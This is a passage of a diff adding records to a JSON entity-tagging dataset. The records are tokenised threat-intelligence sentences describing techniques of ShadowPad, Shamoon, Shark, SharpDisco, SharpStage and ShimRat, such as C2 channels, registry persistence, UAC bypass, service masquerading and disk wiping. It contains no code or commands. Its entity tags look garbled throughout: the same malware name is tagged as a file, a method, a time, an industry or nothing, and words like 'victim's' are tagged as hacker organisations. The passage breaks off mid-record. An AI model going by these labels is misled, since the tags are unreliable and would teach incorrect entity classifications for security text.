+ "ShadowPad", + "has", + "injected", + "a", + "DLL", + "into", + "svchost.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "used", + "FTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "ShadowPad", + "maintains", + "a", + "configuration", + "block", + "and", + "virtual", + "file", + "system", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "deleted", + "arbitrary", + "Registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "downloaded", + "code", + "from", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "can", + "modify", + "the", + "Registry", + "to", + "store", + "and", + "maintain", + "a", + "configuration", + "block", + "and", + "virtual", + "file", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "used", + "UDP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "encoded", + "data", + "as", + "readable", + "Latin", + "characters." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "encrypted", + "its", + "payload,", + "a", + "virtual", + "file", + "system,", + "and", + "various", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "collected", + "the", + "PID", + "of", + "a", + "malicious", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "injected", + "an", + "install", + "module", + "into", + "a", + "newly", + "created", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "sent", + "data", + "back", + "to", + "C2", + "every", + "8", + "hours." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "discovered", + "system", + "information", + "including", + "memory", + "status,", + "CPU", + "frequency,", + "OS", + "versions,", + "and", + "volume", + "serial", + "numbers." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "collected", + "the", + "domain", + "name", + "of", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "collected", + "the", + "username", + "of", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "collected", + "the", + "current", + "date", + "and", + "time", + "of", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "communicates", + "over", + "HTTP", + "to", + "retrieve", + "a", + "string", + "that", + "is", + "decoded", + "into", + "a", + "C2", + "server", + "URL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "attempts", + "to", + "disable", + "UAC", + "remote", + "restrictions", + "by", + "modifying", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "attempts", + "to", + "overwrite", + "operating", + "system", + "files", + "and", + "disk", + "structures", + "with", + "image", + "files.", + "In", + "a", + "later", + "variant,", + "randomly", + "generated", + "data", + "was", + "used", + "for", + "data", + "overwrites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Shamoon", + "has", + "an", + "operational", + "mode", + "for", + "encrypting", + "data", + "instead", + "of", + "overwriting", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "decrypts", + "ciphertext", + "using", + "an", + "XOR", + "cipher", + "and", + "a", + "base64-encoded", + "string." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "has", + "been", + "seen", + "overwriting", + "features", + "of", + "disk", + "structure", + "such", + "as", + "the", + "MBR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Org", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "If", + "Shamoon", + "cannot", + "access", + "shares", + "using", + "current", + "privileges,", + "it", + "attempts", + "access", + "using", + "hard", + "coded,", + "domain-specific", + "credentials", + "gathered", + "earlier", + "in", + "the", + "intrusion." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "can", + "download", + "an", + "executable", + "to", + "run", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "attempts", + "to", + "copy", + "itself", + "to", + "remote", + "machines", + "on", + "the", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "creates", + "a", + "new", + "service", + "named", + "“ntssrv”", + "that", + "attempts", + "to", + "appear", + "legitimate;", + "the", + "service's", + "display", + "name", + "is", + "“Microsoft", + "Network", + "Realtime", + "Inspection", + "Service”", + "and", + "its", + "description", + "is", + "“Helps", + "guard", + "against", + "time", + "change", + "attempts", + "targeting", + "known", + "and", + "newly", + "discovered", + "vulnerabilities", + "in", + "network", + "time", + "protocols.”", + "Newer", + "versions", + "create", + "the", + "\"MaintenaceSrv\"", + "service,", + "which", + "misspells", + "the", + "word", + "\"maintenance.\"" + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Once", + "Shamoon", + "has", + "access", + "to", + "a", + "network", + "share,", + "it", + "enables", + "the", + "RemoteRegistry", + "service", + "on", + "the", + "target", + "system.", + "It", + "will", + "then", + "connect", + "to", + "the", + "system", + "with", + "RegConnectRegistryW", + "and", + "modify", + "the", + "Registry", + "to", + "disable", + "UAC", + "remote", + "restrictions", + "by", + "setting", + "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy</code>", + "to", + "1." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "contains", + "base64-encoded", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "queries", + "several", + "Registry", + "keys", + "to", + "identify", + "hard", + "disk", + "partitions", + "to", + "overwrite." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "scans", + "the", + "C-class", + "subnet", + "of", + "the", + "IPs", + "on", + "the", + "victim's", + "interfaces." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "accesses", + "network", + "share(s),", + "enables", + "share", + "access", + "to", + "the", + "target", + "device,", + "copies", + "an", + "executable", + "payload", + "to", + "the", + "target", + "system,", + "and", + "uses", + "a", + "Scheduled", + "Task/Job", + "to", + "execute", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "copies", + "an", + "executable", + "payload", + "to", + "the", + "target", + "system", + "by", + "using", + "SMB/Windows", + "Admin", + "Shares", + "and", + "then", + "scheduling", + "an", + "unnamed", + "task", + "to", + "execute", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "creates", + "a", + "new", + "service", + "named", + "“ntssrv”", + "to", + "execute", + "the", + "payload.", + "Shamoon", + "can", + "also", + "spread", + "via", + "PsExec." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Shamoon", + "obtains", + "the", + "victim's", + "operating", + "system", + "version", + "and", + "keyboard", + "layout", + "and", + "sends", + "the", + "information", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "obtains", + "the", + "target's", + "IP", + "address", + "and", + "local", + "network", + "segment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "will", + "reboot", + "the", + "infected", + "system", + "once", + "the", + "wiping", + "functionality", + "has", + "been", + "completed." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "obtains", + "the", + "system", + "time", + "and", + "will", + "only", + "activate", + "if", + "it", + "is", + "greater", + "than", + "a", + "preset", + "date." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "can", + "change", + "the", + "modified", + "time", + "for", + "files", + "to", + "evade", + "forensic", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "can", + "impersonate", + "tokens", + "using", + "<code>LogonUser</code>,", + "<code>ImpersonateLoggedOnUser</code>,", + "and", + "<code>ImpersonateNamedPipeClient</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Shamoon", + "creates", + "a", + "new", + "service", + "named", + "“ntssrv”", + "to", + "execute", + "the", + "payload.", + "Newer", + "versions", + "create", + "the", + "\"MaintenaceSrv\"", + "and", + "\"hdv_725x\"", + "services." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "use", + "DNS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "has", + "stored", + "information", + "in", + "folders", + "named", + "`U1`", + "and", + "`U2`", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "upload", + "files", + "to", + "its", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "extract", + "and", + "decrypt", + "downloaded", + ".zip", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "send", + "DNS", + "C2", + "communications", + "using", + "a", + "unique", + "domain", + "generation", + "algorithm." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "use", + "encrypted", + "and", + "encoded", + "files", + "for", + "C2", + "configuration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "the", + "compromised", + "host", + "over", + "a", + "DNS", + "or", + "HTTP", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "update", + "its", + "configuration", + "to", + "use", + "a", + "different", + "C2", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Shark", + "can", + "delete", + "files", + "downloaded", + "to", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "download", + "additional", + "files", + "from", + "its", + "C2", + "via", + "HTTP", + "or", + "DNS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Shark", + "binaries", + "have", + "been", + "named", + "`audioddg.pdb`", + "and", + "`Winlangdb.pdb`", + "in", + "order", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "query", + "`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", + "MachineGuid`", + "to", + "retrieve", + "the", + "machine", + "GUID." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "pause", + "C2", + "communications", + "for", + "a", + "specified", + "time." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "stop", + "execution", + "if", + "the", + "screen", + "width", + "of", + "the", + "targeted", + "machine", + "is", + "not", + "over", + "600", + "pixels." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "can", + "collect", + "the", + "GUID", + "of", + "a", + "targeted", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shark", + "has", + "the", + "ability", + "to", + "use", + "`CMD`", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "has", + "dropped", + "a", + "recent-files", + "stealer", + "plugin", + "to", + "`C:\\Users\\Public\\WinSrcNT\\It11.exe`." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "load", + "a", + "plugin", + "to", + "exfiltrate", + "stolen", + "files", + "to", + "SMB", + "shares", + "also", + "used", + "in", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "has", + "the", + "ability", + "to", + "transfer", + "data", + "between", + "SMB", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "identify", + "recently", + "opened", + "files", + "by", + "using", + "an", + "LNK", + "format", + "parser", + "to", + "extract", + "the", + "original", + "file", + "path", + "from", + "LNK", + "files", + "found", + "in", + "either", + "`%USERPROFILE%\\Recent`", + "(Windows", + "XP)", + "or", + "`%APPDATA%\\Microsoft\\Windows\\Recent`", + "(newer", + "Windows", + "versions)", + "." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "hide", + "windows", + "using", + "`ProcessWindowStyle.Hidden`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SharpDisco", + "has", + "been", + "used", + "to", + "download", + "a", + "Python", + "interpreter", + "to", + "`C:\\Users\\Public\\WinTN\\WinTN.exe`", + "as", + "well", + "as", + "other", + "plugins", + "from", + "external", + "sources." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "leverage", + "Native", + "APIs", + "through", + "plugins", + "including", + "`GetLogicalDrives`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SharpDisco", + "has", + "dropped", + "a", + "plugin", + "to", + "monitor", + "external", + "drives", + "to", + "`C:\\Users\\Public\\It3.exe`." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "create", + "scheduled", + "tasks", + "to", + "execute", + "reverse", + "shells", + "that", + "read", + "and", + "write", + "data", + "to", + "and", + "from", + "specified", + "SMB", + "shares." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "use", + "a", + "plugin", + "to", + "enumerate", + "system", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpDisco", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "plugins", + "and", + "to", + "send", + "command", + "output", + "to", + "specified", + "SMB", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "decompressed", + "data", + "received", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "additional", + "payloads", + "via", + "a", + "DropBox", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SharpStage", + "can", + "execute", + "arbitrary", + "commands", + "with", + "PowerShell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "the", + "ability", + "to", + "create", + "persistence", + "for", + "the", + "malware", + "using", + "the", + "Registry", + "autorun", + "key", + "and", + "startup", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "a", + "persistence", + "component", + "to", + "write", + "a", + "scheduled", + "task", + "for", + "the", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "the", + "ability", + "to", + "capture", + "the", + "victim's", + "screen." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "checked", + "the", + "system", + "settings", + "to", + "see", + "if", + "Arabic", + "is", + "the", + "configured", + "language." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "been", + "used", + "to", + "target", + "Arabic-speaking", + "users", + "and", + "used", + "code", + "that", + "checks", + "if", + "the", + "compromised", + "machine", + "has", + "the", + "Arabic", + "language", + "installed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "has", + "used", + "a", + "legitimate", + "web", + "service", + "for", + "evading", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "can", + "execute", + "arbitrary", + "commands", + "with", + "the", + "command", + "line." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SharpStage", + "can", + "use", + "WMI", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "installed", + "shim", + "databases", + "in", + "the", + "<code>AppPatch</code>", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "hijacked", + "the", + "cryptbase.dll", + "within", + "migwiz.exe", + "to", + "escalate", + "privileges.", + "This", + "prevented", + "the", + "User", + "Access", + "Control", + "window", + "from", + "appearing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "the", + "capability", + "to", + "upload", + "collected", + "files", + "to", + "a", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "decompressed", + "its", + "core", + "DLL", + "using", + "shellcode", + "once", + "an", + "impersonated", + "antivirus", + "component", + "was", + "running", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "use", + "pre-configured", + "HTTP", + "proxies." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "used", + "a", + "secondary", + "C2", + "location", + "if", + "the", + "first", + "was", + "unavailable." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "uninstall", + "itself", + "from", + "compromised", + "hosts,", + "as", + "well", + "create", + "and", + "modify", + "directories,", + "delete,", + "move,", + "copy,", + "and", + "rename", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "list", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "hijack", + "the", + "cryptbase.dll", + "within", + "migwiz.exe", + "to", + "escalate", + "privileges", + "and", + "bypass", + "UAC", + "controls." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "impersonate", + "Windows", + "services", + "and", + "antivirus", + "products", + "to", + "avoid", + "detection", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "registered", + "two", + "registry", + "keys", + "for", + "shim", + "databases." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "used", + "Windows", + "API", + "functions", + "to", + "install", + "the", + "service", + "and", + "shim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "enumerate", + "connected", + "drives", + "for", + "infected", + "host", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "been", + "delivered", + "as", + "a", + "package", + "that", + "includes", + "compressed", + "DLL", + "and", + "shellcode", + "payloads", + "within", + "a", + ".dat", + "file." + ], + "ner_tags": 